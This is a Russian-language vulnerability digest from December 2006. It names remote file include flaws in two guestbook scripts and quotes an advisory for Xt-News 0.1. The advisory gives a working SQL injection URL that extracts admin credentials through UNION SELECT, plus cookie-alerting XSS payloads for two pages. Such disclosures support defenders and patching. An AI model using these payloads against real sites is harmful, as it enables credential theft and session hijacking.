Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

EternalMart Guestbook 1.1.0 [emgb_admin_path] Remote File Include

KISGB (Keep It Simple Guest Book)* [default_path_for_the mes]  Remote File Include

Multiple Remote Vulnerabilities in KISGB

From:	Mr_KaLiMaN <mr_kaliman_(at)_msn.com>
Date:	23 декабря 2006 г.
Subject:	Xt-News 0.1 : SQL Injection Vulnerability & XSS

Xt-News 0.1
-----------
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06

Description:
------------
SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.
php?id_news="><script>alert(document.
cookie)</script><foo "
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.
php?id_news='><script>alert(document.
cookie)</script><foo '


-------------------